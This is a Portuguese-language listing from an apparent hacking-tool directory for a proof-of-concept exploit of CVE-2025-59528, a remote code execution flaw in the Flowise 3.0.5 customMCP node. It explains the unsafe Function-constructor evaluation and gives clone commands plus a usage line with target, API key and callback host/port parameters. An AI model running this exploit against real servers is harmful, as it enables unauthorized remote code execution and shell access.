Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59528 — CVE-2025-59528 Prova de Conceito | Kitploit
Ferramentas/GitHubGitHub/vanhari/cve-2025-59528
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubvanhari/cve-2025-59528

CVE-2025-59528

CVE-2025-59528 Prova de Conceito

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59528 – Flowise CustomMCP Node RCE (PoC)

Visitors

Visão Geral

Este repositório contém uma prova de conceito demonstrando CVE-2025-59528 no Flowise v3.0.5

A vulnerabilidade existe no nó customMCP, onde a entrada mcpServerConfig fornecida pelo usuário é processada de uma forma que leva à execução de código JavaScript por meio de avaliação insegura usando o construtor Function.

Versões Afetadas

Baixar ferramenta
AfetadasCorrigida
3.0.53.0.6

Impacto

Um usuário autenticado pode ser capaz de executar JavaScript arbitrário no servidor, potencialmente levando à execução remota de código.

Instalação

OSX/Linux

root@kitploit:~
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528

Windows

root@kitploit:~
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528

Uso

root@kitploit:~
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Usage

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado pela ferramenta.